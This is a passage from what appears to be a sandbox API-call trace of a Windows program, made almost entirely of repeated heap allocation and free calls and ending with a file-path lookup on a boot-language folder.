(HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.684] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.685] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.685] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.686] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.690] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0165.690] RtlAllocateHeap (HeapHandle=0xcd0000, 